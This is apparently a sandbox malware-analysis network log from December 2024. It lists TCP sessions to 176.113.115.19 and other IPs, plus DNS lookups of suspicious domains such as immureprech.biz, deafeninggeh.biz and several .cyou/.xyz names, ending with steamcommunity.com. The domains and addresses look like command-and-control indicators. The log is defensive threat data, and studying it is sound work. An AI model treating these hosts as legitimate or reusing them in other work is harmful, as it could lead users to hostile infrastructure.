                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.829061985 CET4971580192.168.2.10176.113.115.19
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.829111099 CET8049715176.113.115.19192.168.2.10
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.829149008 CET4971580192.168.2.10176.113.115.19
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.830461979 CET8049715176.113.115.19192.168.2.10
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.830513000 CET4971580192.168.2.10176.113.115.19
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.830534935 CET8049715176.113.115.19192.168.2.10
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.830580950 CET4971580192.168.2.10176.113.115.19
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.831837893 CET8049715176.113.115.19192.168.2.10
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.831901073 CET4971580192.168.2.10176.113.115.19
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.831935883 CET8049715176.113.115.19192.168.2.10
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.831975937 CET4971580192.168.2.10176.113.115.19
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.833189964 CET8049715176.113.115.19192.168.2.10
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.833245039 CET8049715176.113.115.19192.168.2.10
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.833265066 CET4971580192.168.2.10176.113.115.19
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.833282948 CET4971580192.168.2.10176.113.115.19
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.834538937 CET8049715176.113.115.19192.168.2.10
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.834610939 CET4971580192.168.2.10176.113.115.19
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.834631920 CET8049715176.113.115.19192.168.2.10
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.834678888 CET4971580192.168.2.10176.113.115.19
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.835925102 CET8049715176.113.115.19192.168.2.10
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.835973024 CET8049715176.113.115.19192.168.2.10
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.835979939 CET4971580192.168.2.10176.113.115.19
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.836066008 CET4971580192.168.2.10176.113.115.19
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.837290049 CET8049715176.113.115.19192.168.2.10
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.837347031 CET4971580192.168.2.10176.113.115.19
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.837371111 CET8049715176.113.115.19192.168.2.10
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.837413073 CET4971580192.168.2.10176.113.115.19
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.838674068 CET8049715176.113.115.19192.168.2.10
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.838726044 CET4971580192.168.2.10176.113.115.19
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.838759899 CET8049715176.113.115.19192.168.2.10
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.838804007 CET4971580192.168.2.10176.113.115.19
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.840740919 CET8049715176.113.115.19192.168.2.10
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.840801001 CET4971580192.168.2.10176.113.115.19
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.840873003 CET8049715176.113.115.19192.168.2.10
Dec 17, 2024 09:42:44.840917110 CET | 49715 | 80 | 192.168.2.10 | 176.113.115.19
Dec 17, 2024 09:42:44.842351913 CET | 80 | 49715 | 176.113.115.19 | 192.168.2.10
Dec 17, 2024 09:42:44.842403889 CET | 49715 | 80 | 192.168.2.10 | 176.113.115.19
Dec 17, 2024 09:42:44.842427969 CET | 80 | 49715 | 176.113.115.19 | 192.168.2.10
Dec 17, 2024 09:42:44.842470884 CET | 49715 | 80 | 192.168.2.10 | 176.113.115.19
Dec 17, 2024 09:42:44.843502045 CET | 80 | 49715 | 176.113.115.19 | 192.168.2.10
Dec 17, 2024 09:42:44.843547106 CET | 49715 | 80 | 192.168.2.10 | 176.113.115.19
Dec 17, 2024 09:42:44.843636990 CET | 80 | 49715 | 176.113.115.19 | 192.168.2.10
Dec 17, 2024 09:42:44.843689919 CET | 49715 | 80 | 192.168.2.10 | 176.113.115.19
Dec 17, 2024 09:42:44.844600916 CET | 80 | 49715 | 176.113.115.19 | 192.168.2.10
Dec 17, 2024 09:42:44.844655037 CET | 49715 | 80 | 192.168.2.10 | 176.113.115.19
Dec 17, 2024 09:42:44.844681025 CET | 80 | 49715 | 176.113.115.19 | 192.168.2.10
Dec 17, 2024 09:42:44.844723940 CET | 49715 | 80 | 192.168.2.10 | 176.113.115.19
Dec 17, 2024 09:42:44.845514059 CET | 80 | 49715 | 176.113.115.19 | 192.168.2.10
Dec 17, 2024 09:42:44.845561981 CET | 49715 | 80 | 192.168.2.10 | 176.113.115.19
Dec 17, 2024 09:42:44.845587969 CET | 80 | 49715 | 176.113.115.19 | 192.168.2.10
Dec 17, 2024 09:42:44.845628023 CET | 49715 | 80 | 192.168.2.10 | 176.113.115.19
Dec 17, 2024 09:42:44.847018003 CET | 80 | 49715 | 176.113.115.19 | 192.168.2.10
Dec 17, 2024 09:42:44.847068071 CET | 49715 | 80 | 192.168.2.10 | 176.113.115.19
Dec 17, 2024 09:42:44.847160101 CET | 80 | 49715 | 176.113.115.19 | 192.168.2.10
Dec 17, 2024 09:42:44.847203016 CET | 49715 | 80 | 192.168.2.10 | 176.113.115.19
Dec 17, 2024 09:42:44.848341942 CET | 80 | 49715 | 176.113.115.19 | 192.168.2.10
Dec 17, 2024 09:42:44.848392010 CET | 49715 | 80 | 192.168.2.10 | 176.113.115.19
Dec 17, 2024 09:42:44.848453045 CET | 80 | 49715 | 176.113.115.19 | 192.168.2.10
Dec 17, 2024 09:42:44.848501921 CET | 49715 | 80 | 192.168.2.10 | 176.113.115.19
Dec 17, 2024 09:42:44.849673033 CET | 80 | 49715 | 176.113.115.19 | 192.168.2.10
Dec 17, 2024 09:42:44.849734068 CET | 49715 | 80 | 192.168.2.10 | 176.113.115.19
Dec 17, 2024 09:42:44.849900007 CET | 80 | 49715 | 176.113.115.19 | 192.168.2.10
Dec 17, 2024 09:42:44.849951982 CET | 49715 | 80 | 192.168.2.10 | 176.113.115.19
Dec 17, 2024 09:42:44.990339041 CET | 80 | 49715 | 176.113.115.19 | 192.168.2.10
Dec 17, 2024 09:42:44.990428925 CET | 49715 | 80 | 192.168.2.10 | 176.113.115.19
Dec 17, 2024 09:42:44.990454912 CET | 80 | 49715 | 176.113.115.19 | 192.168.2.10
Dec 17, 2024 09:42:44.990504980 CET | 49715 | 80 | 192.168.2.10 | 176.113.115.19
Dec 17, 2024 09:42:44.990932941 CET | 80 | 49715 | 176.113.115.19 | 192.168.2.10
Dec 17, 2024 09:42:44.990999937 CET | 49715 | 80 | 192.168.2.10 | 176.113.115.19
Dec 17, 2024 09:42:44.991051912 CET | 80 | 49715 | 176.113.115.19 | 192.168.2.10
Dec 17, 2024 09:42:44.991149902 CET | 49715 | 80 | 192.168.2.10 | 176.113.115.19
Dec 17, 2024 09:42:44.992052078 CET | 80 | 49715 | 176.113.115.19 | 192.168.2.10
Dec 17, 2024 09:42:44.992125988 CET | 49715 | 80 | 192.168.2.10 | 176.113.115.19
Dec 17, 2024 09:42:44.992152929 CET | 80 | 49715 | 176.113.115.19 | 192.168.2.10
Dec 17, 2024 09:42:44.992248058 CET | 49715 | 80 | 192.168.2.10 | 176.113.115.19
Dec 17, 2024 09:42:44.993189096 CET | 80 | 49715 | 176.113.115.19 | 192.168.2.10
Dec 17, 2024 09:42:44.993345976 CET | 80 | 49715 | 176.113.115.19 | 192.168.2.10
Dec 17, 2024 09:42:44.993391037 CET | 49715 | 80 | 192.168.2.10 | 176.113.115.19
Dec 17, 2024 09:42:44.993391037 CET | 49715 | 80 | 192.168.2.10 | 176.113.115.19
Dec 17, 2024 09:42:44.994425058 CET | 80 | 49715 | 176.113.115.19 | 192.168.2.10
Dec 17, 2024 09:42:44.994482994 CET | 49715 | 80 | 192.168.2.10 | 176.113.115.19
Dec 17, 2024 09:42:44.994549036 CET | 80 | 49715 | 176.113.115.19 | 192.168.2.10
Dec 17, 2024 09:42:44.994693041 CET | 49715 | 80 | 192.168.2.10 | 176.113.115.19
Dec 17, 2024 09:42:44.995537043 CET | 80 | 49715 | 176.113.115.19 | 192.168.2.10
Dec 17, 2024 09:42:44.995577097 CET | 80 | 49715 | 176.113.115.19 | 192.168.2.10
Dec 17, 2024 09:42:44.995590925 CET | 49715 | 80 | 192.168.2.10 | 176.113.115.19
Dec 17, 2024 09:42:44.995642900 CET | 49715 | 80 | 192.168.2.10 | 176.113.115.19
Dec 17, 2024 09:42:44.996627092 CET | 80 | 49715 | 176.113.115.19 | 192.168.2.10
Dec 17, 2024 09:42:44.996676922 CET | 49715 | 80 | 192.168.2.10 | 176.113.115.19
Dec 17, 2024 09:42:44.996726036 CET | 80 | 49715 | 176.113.115.19 | 192.168.2.10
Dec 17, 2024 09:42:44.996813059 CET | 49715 | 80 | 192.168.2.10 | 176.113.115.19
Dec 17, 2024 09:42:44.997769117 CET | 80 | 49715 | 176.113.115.19 | 192.168.2.10
Dec 17, 2024 09:42:44.997874975 CET | 49715 | 80 | 192.168.2.10 | 176.113.115.19
Dec 17, 2024 09:42:44.997917891 CET | 80 | 49715 | 176.113.115.19 | 192.168.2.10
Dec 17, 2024 09:42:44.998296976 CET | 49715 | 80 | 192.168.2.10 | 176.113.115.19
Dec 17, 2024 09:42:44.998927116 CET | 80 | 49715 | 176.113.115.19 | 192.168.2.10
Dec 17, 2024 09:42:44.999000072 CET | 80 | 49715 | 176.113.115.19 | 192.168.2.10
Dec 17, 2024 09:42:44.999042988 CET | 49715 | 80 | 192.168.2.10 | 176.113.115.19
Dec 17, 2024 09:42:44.999042988 CET | 49715 | 80 | 192.168.2.10 | 176.113.115.19
Dec 17, 2024 09:42:45.000061989 CET | 80 | 49715 | 176.113.115.19 | 192.168.2.10
Dec 17, 2024 09:42:45.000144958 CET | 49715 | 80 | 192.168.2.10 | 176.113.115.19
Dec 17, 2024 09:42:45.000168085 CET | 80 | 49715 | 176.113.115.19 | 192.168.2.10
Dec 17, 2024 09:42:45.000252962 CET | 49715 | 80 | 192.168.2.10 | 176.113.115.19
Dec 17, 2024 09:42:45.001218081 CET | 80 | 49715 | 176.113.115.19 | 192.168.2.10
Dec 17, 2024 09:42:45.001296997 CET | 49715 | 80 | 192.168.2.10 | 176.113.115.19
Dec 17, 2024 09:42:45.001308918 CET | 80 | 49715 | 176.113.115.19 | 192.168.2.10
Dec 17, 2024 09:42:45.001359940 CET | 49715 | 80 | 192.168.2.10 | 176.113.115.19
Dec 17, 2024 09:42:45.002371073 CET | 80 | 49715 | 176.113.115.19 | 192.168.2.10
Dec 17, 2024 09:42:45.002420902 CET | 80 | 49715 | 176.113.115.19 | 192.168.2.10
Dec 17, 2024 09:42:45.002458096 CET | 49715 | 80 | 192.168.2.10 | 176.113.115.19
Dec 17, 2024 09:42:45.002458096 CET | 49715 | 80 | 192.168.2.10 | 176.113.115.19
Dec 17, 2024 09:42:45.003532887 CET | 80 | 49715 | 176.113.115.19 | 192.168.2.10
Dec 17, 2024 09:42:45.003619909 CET | 80 | 49715 | 176.113.115.19 | 192.168.2.10
Dec 17, 2024 09:42:45.003664017 CET | 49715 | 80 | 192.168.2.10 | 176.113.115.19
Dec 17, 2024 09:42:45.003664017 CET | 49715 | 80 | 192.168.2.10 | 176.113.115.19
Dec 17, 2024 09:42:45.004679918 CET | 80 | 49715 | 176.113.115.19 | 192.168.2.10
Dec 17, 2024 09:42:45.004718065 CET | 80 | 49715 | 176.113.115.19 | 192.168.2.10
Dec 17, 2024 09:42:45.005835056 CET | 49715 | 80 | 192.168.2.10 | 176.113.115.19
Dec 17, 2024 09:42:45.005841970 CET | 80 | 49715 | 176.113.115.19 | 192.168.2.10
Dec 17, 2024 09:42:45.006278038 CET | 49715 | 80 | 192.168.2.10 | 176.113.115.19
Dec 17, 2024 09:42:49.256057978 CET | 80 | 49715 | 176.113.115.19 | 192.168.2.10
Dec 17, 2024 09:42:49.256114960 CET | 49715 | 80 | 192.168.2.10 | 176.113.115.19
Dec 17, 2024 09:42:49.581794977 CET | 49736 | 443 | 192.168.2.10 | 45.77.249.79
Dec 17, 2024 09:42:49.581856966 CET | 443 | 49736 | 45.77.249.79 | 192.168.2.10
Dec 17, 2024 09:42:49.581921101 CET | 49736 | 443 | 192.168.2.10 | 45.77.249.79
Dec 17, 2024 09:42:49.582957983 CET | 49736 | 443 | 192.168.2.10 | 45.77.249.79
Dec 17, 2024 09:42:49.582982063 CET | 443 | 49736 | 45.77.249.79 | 192.168.2.10
Dec 17, 2024 09:42:51.495933056 CET | 443 | 49736 | 45.77.249.79 | 192.168.2.10
Dec 17, 2024 09:42:51.496306896 CET | 49736 | 443 | 192.168.2.10 | 45.77.249.79
Dec 17, 2024 09:42:51.498296022 CET | 49736 | 443 | 192.168.2.10 | 45.77.249.79
Dec 17, 2024 09:42:51.498310089 CET | 443 | 49736 | 45.77.249.79 | 192.168.2.10
Dec 17, 2024 09:42:51.498657942 CET | 443 | 49736 | 45.77.249.79 | 192.168.2.10
Dec 17, 2024 09:42:51.555234909 CET | 49736 | 443 | 192.168.2.10 | 45.77.249.79
Dec 17, 2024 09:42:51.555234909 CET | 49736 | 443 | 192.168.2.10 | 45.77.249.79
Dec 17, 2024 09:42:51.555428028 CET | 443 | 49736 | 45.77.249.79 | 192.168.2.10
Dec 17, 2024 09:42:52.466356993 CET | 443 | 49736 | 45.77.249.79 | 192.168.2.10
Dec 17, 2024 09:42:52.466464996 CET | 443 | 49736 | 45.77.249.79 | 192.168.2.10
Dec 17, 2024 09:42:52.466550112 CET | 49736 | 443 | 192.168.2.10 | 45.77.249.79
Dec 17, 2024 09:42:52.479820967 CET | 49736 | 443 | 192.168.2.10 | 45.77.249.79
Dec 17, 2024 09:42:52.479872942 CET | 443 | 49736 | 45.77.249.79 | 192.168.2.10
Dec 17, 2024 09:42:52.479890108 CET | 49736 | 443 | 192.168.2.10 | 45.77.249.79
Dec 17, 2024 09:42:52.479897976 CET | 443 | 49736 | 45.77.249.79 | 192.168.2.10
Dec 17, 2024 09:42:54.052412987 CET | 49748 | 443 | 192.168.2.10 | 104.131.68.180
Dec 17, 2024 09:42:54.052467108 CET | 443 | 49748 | 104.131.68.180 | 192.168.2.10
Dec 17, 2024 09:42:54.057951927 CET | 49748 | 443 | 192.168.2.10 | 104.131.68.180
Dec 17, 2024 09:42:54.060348988 CET | 49748 | 443 | 192.168.2.10 | 104.131.68.180
Dec 17, 2024 09:42:54.060379982 CET | 443 | 49748 | 104.131.68.180 | 192.168.2.10
Dec 17, 2024 09:42:55.293925047 CET | 443 | 49748 | 104.131.68.180 | 192.168.2.10
Dec 17, 2024 09:42:55.294008017 CET | 49748 | 443 | 192.168.2.10 | 104.131.68.180
Dec 17, 2024 09:42:55.296915054 CET | 49748 | 443 | 192.168.2.10 | 104.131.68.180
Dec 17, 2024 09:42:55.296922922 CET | 443 | 49748 | 104.131.68.180 | 192.168.2.10
Dec 17, 2024 09:42:55.297266006 CET | 443 | 49748 | 104.131.68.180 | 192.168.2.10
Dec 17, 2024 09:42:55.298894882 CET | 49748 | 443 | 192.168.2.10 | 104.131.68.180
Dec 17, 2024 09:42:55.299017906 CET | 49748 | 443 | 192.168.2.10 | 104.131.68.180
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:55.299058914 CET44349748104.131.68.180192.168.2.10
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:55.716460943 CET44349748104.131.68.180192.168.2.10
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:55.716552973 CET44349748104.131.68.180192.168.2.10
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:55.717494011 CET49748443192.168.2.10104.131.68.180
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:55.717494011 CET49748443192.168.2.10104.131.68.180
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:55.717540979 CET44349748104.131.68.180192.168.2.10
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:55.717597008 CET49748443192.168.2.10104.131.68.180
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:55.717606068 CET44349748104.131.68.180192.168.2.10
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:57.266853094 CET49756443192.168.2.10104.121.10.34
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:57.266901970 CET44349756104.121.10.34192.168.2.10
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:57.267003059 CET49756443192.168.2.10104.121.10.34
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:57.268049955 CET49756443192.168.2.10104.121.10.34
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:57.268064976 CET44349756104.121.10.34192.168.2.10
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:58.661750078 CET44349756104.121.10.34192.168.2.10
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:58.661848068 CET49756443192.168.2.10104.121.10.34
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:58.665450096 CET49756443192.168.2.10104.121.10.34
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:58.665462017 CET44349756104.121.10.34192.168.2.10
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:58.665801048 CET44349756104.121.10.34192.168.2.10
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:58.675175905 CET49756443192.168.2.10104.121.10.34
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:58.715329885 CET44349756104.121.10.34192.168.2.10
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:59.448795080 CET44349756104.121.10.34192.168.2.10
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:59.448822021 CET44349756104.121.10.34192.168.2.10
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:59.448842049 CET44349756104.121.10.34192.168.2.10
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:59.449130058 CET49756443192.168.2.10104.121.10.34
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:59.449152946 CET44349756104.121.10.34192.168.2.10
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:59.449248075 CET49756443192.168.2.10104.121.10.34
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:59.627957106 CET44349756104.121.10.34192.168.2.10
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:59.628022909 CET44349756104.121.10.34192.168.2.10
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:59.628057957 CET44349756104.121.10.34192.168.2.10
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:59.628086090 CET49756443192.168.2.10104.121.10.34
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:59.628086090 CET49756443192.168.2.10104.121.10.34
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:59.628125906 CET49756443192.168.2.10104.121.10.34
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:59.628314018 CET49756443192.168.2.10104.121.10.34
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:59.628314018 CET49756443192.168.2.10104.121.10.34
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:59.628340006 CET44349756104.121.10.34192.168.2.10
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:59.628349066 CET44349756104.121.10.34192.168.2.10
                                                                                                                                                                                                                                          Dec 17, 2024 09:44:30.087096930 CET4971580192.168.2.10176.113.115.19
                                                                                                                                                                                                                                          Dec 17, 2024 09:44:30.399104118 CET4971580192.168.2.10176.113.115.19
                                                                                                                                                                                                                                          Dec 17, 2024 09:44:31.008455038 CET4971580192.168.2.10176.113.115.19
                                                                                                                                                                                                                                          Dec 17, 2024 09:44:32.211592913 CET4971580192.168.2.10176.113.115.19
                                                                                                                                                                                                                                          Dec 17, 2024 09:44:34.621037006 CET4971580192.168.2.10176.113.115.19
                                                                                                                                                                                                                                          Dec 17, 2024 09:44:39.430352926 CET4971580192.168.2.10176.113.115.19
                                                                                                                                                                                                                                          Dec 17, 2024 09:44:49.039736986 CET4971580192.168.2.10176.113.115.19
                                                                                                                                                                                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:40.107752085 CET5676353192.168.2.101.1.1.1
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:40.341396093 CET53567631.1.1.1192.168.2.10
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:47.903635979 CET6374253192.168.2.101.1.1.1
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:48.123011112 CET53637421.1.1.1192.168.2.10
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:48.126338959 CET5844653192.168.2.101.1.1.1
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:49.117774010 CET5844653192.168.2.101.1.1.1
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:49.574898958 CET53584461.1.1.1192.168.2.10
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:49.574927092 CET53584461.1.1.1192.168.2.10
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:52.600049973 CET6070653192.168.2.101.1.1.1
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:53.587291956 CET6070653192.168.2.101.1.1.1
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:54.051062107 CET53607061.1.1.1192.168.2.10
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:54.051119089 CET53607061.1.1.1192.168.2.10
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:55.722625971 CET5426253192.168.2.101.1.1.1
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:55.942847967 CET53542621.1.1.1192.168.2.10
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:55.979276896 CET5777453192.168.2.101.1.1.1
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:56.202600002 CET53577741.1.1.1192.168.2.10
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:56.205224037 CET5689153192.168.2.101.1.1.1
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:56.424360991 CET53568911.1.1.1192.168.2.10
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:56.428498030 CET5596753192.168.2.101.1.1.1
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:56.657001019 CET53559671.1.1.1192.168.2.10
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:56.659991026 CET5152553192.168.2.101.1.1.1
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:56.981900930 CET53515251.1.1.1192.168.2.10
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:56.983802080 CET5069553192.168.2.101.1.1.1
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:57.124418020 CET53506951.1.1.1192.168.2.10
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:57.126993895 CET5826453192.168.2.101.1.1.1
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:57.265892029 CET53582641.1.1.1192.168.2.10
                                                                                                                                                                                                                                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:40.107752085 CET192.168.2.101.1.1.10x13a0Standard query (0)post-to-me.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:47.903635979 CET192.168.2.101.1.1.10x8eb0Standard query (0)sordid-snaked.cyouA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:48.126338959 CET192.168.2.101.1.1.10xfb30Standard query (0)immureprech.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:49.117774010 CET192.168.2.101.1.1.10xfb30Standard query (0)immureprech.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:52.600049973 CET192.168.2.101.1.1.10xe2b8Standard query (0)deafeninggeh.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:53.587291956 CET192.168.2.101.1.1.10xe2b8Standard query (0)deafeninggeh.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:55.722625971 CET192.168.2.101.1.1.10x2f9dStandard query (0)effecterectz.xyzA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:55.979276896 CET192.168.2.101.1.1.10x8751Standard query (0)diffuculttan.xyzA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:56.205224037 CET192.168.2.101.1.1.10xb33Standard query (0)debonairnukk.xyzA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:56.428498030 CET192.168.2.101.1.1.10x33bfStandard query (0)wrathful-jammy.cyouA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:56.659991026 CET192.168.2.101.1.1.10x950dStandard query (0)awake-weaves.cyouA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:56.983802080 CET192.168.2.101.1.1.10x565Standard query (0)sordid-snaked.cyouA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:57.126993895 CET192.168.2.101.1.1.10x9960Standard query (0)steamcommunity.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:40.341396093 CET1.1.1.1192.168.2.100x13a0No error (0)post-to-me.com104.21.56.70A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:40.341396093 CET1.1.1.1192.168.2.100x13a0No error (0)post-to-me.com172.67.179.207A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:48.123011112 CET1.1.1.1192.168.2.100x8eb0Name error (3)sordid-snaked.cyounonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:49.574898958 CET1.1.1.1192.168.2.100xfb30No error (0)immureprech.biz45.77.249.79A (IP address)IN (0x0001)false
Dec 17, 2024 09:42:49.574898958 CET | 1.1.1.1 | 192.168.2.10 | 0xfb30 | No error (0) | immureprech.biz | | 178.62.201.34 | A (IP address) | IN (0x0001) | false
Dec 17, 2024 09:42:49.574898958 CET | 1.1.1.1 | 192.168.2.10 | 0xfb30 | No error (0) | immureprech.biz | | 104.131.68.180 | A (IP address) | IN (0x0001) | false
Dec 17, 2024 09:42:49.574927092 CET | 1.1.1.1 | 192.168.2.10 | 0xfb30 | No error (0) | immureprech.biz | | 45.77.249.79 | A (IP address) | IN (0x0001) | false
Dec 17, 2024 09:42:49.574927092 CET | 1.1.1.1 | 192.168.2.10 | 0xfb30 | No error (0) | immureprech.biz | | 178.62.201.34 | A (IP address) | IN (0x0001) | false
Dec 17, 2024 09:42:49.574927092 CET | 1.1.1.1 | 192.168.2.10 | 0xfb30 | No error (0) | immureprech.biz | | 104.131.68.180 | A (IP address) | IN (0x0001) | false
Dec 17, 2024 09:42:54.051062107 CET | 1.1.1.1 | 192.168.2.10 | 0xe2b8 | No error (0) | deafeninggeh.biz | | 104.131.68.180 | A (IP address) | IN (0x0001) | false
Dec 17, 2024 09:42:54.051062107 CET | 1.1.1.1 | 192.168.2.10 | 0xe2b8 | No error (0) | deafeninggeh.biz | | 45.77.249.79 | A (IP address) | IN (0x0001) | false
Dec 17, 2024 09:42:54.051062107 CET | 1.1.1.1 | 192.168.2.10 | 0xe2b8 | No error (0) | deafeninggeh.biz | | 178.62.201.34 | A (IP address) | IN (0x0001) | false
Dec 17, 2024 09:42:54.051119089 CET | 1.1.1.1 | 192.168.2.10 | 0xe2b8 | No error (0) | deafeninggeh.biz | | 104.131.68.180 | A (IP address) | IN (0x0001) | false
Dec 17, 2024 09:42:54.051119089 CET | 1.1.1.1 | 192.168.2.10 | 0xe2b8 | No error (0) | deafeninggeh.biz | | 45.77.249.79 | A (IP address) | IN (0x0001) | false
Dec 17, 2024 09:42:54.051119089 CET | 1.1.1.1 | 192.168.2.10 | 0xe2b8 | No error (0) | deafeninggeh.biz | | 178.62.201.34 | A (IP address) | IN (0x0001) | false
Dec 17, 2024 09:42:55.942847967 CET | 1.1.1.1 | 192.168.2.10 | 0x2f9d | Name error (3) | effecterectz.xyz | none | none | A (IP address) | IN (0x0001) | false
Dec 17, 2024 09:42:56.202600002 CET | 1.1.1.1 | 192.168.2.10 | 0x8751 | Name error (3) | diffuculttan.xyz | none | none | A (IP address) | IN (0x0001) | false
Dec 17, 2024 09:42:56.424360991 CET | 1.1.1.1 | 192.168.2.10 | 0xb33 | Name error (3) | debonairnukk.xyz | none | none | A (IP address) | IN (0x0001) | false
Dec 17, 2024 09:42:56.657001019 CET | 1.1.1.1 | 192.168.2.10 | 0x33bf | Name error (3) | wrathful-jammy.cyou | none | none | A (IP address) | IN (0x0001) | false
Dec 17, 2024 09:42:56.981900930 CET | 1.1.1.1 | 192.168.2.10 | 0x950d | Name error (3) | awake-weaves.cyou | none | none | A (IP address) | IN (0x0001) | false
Dec 17, 2024 09:42:57.124418020 CET | 1.1.1.1 | 192.168.2.10 | 0x565 | Name error (3) | sordid-snaked.cyou | none | none | A (IP address) | IN (0x0001) | false
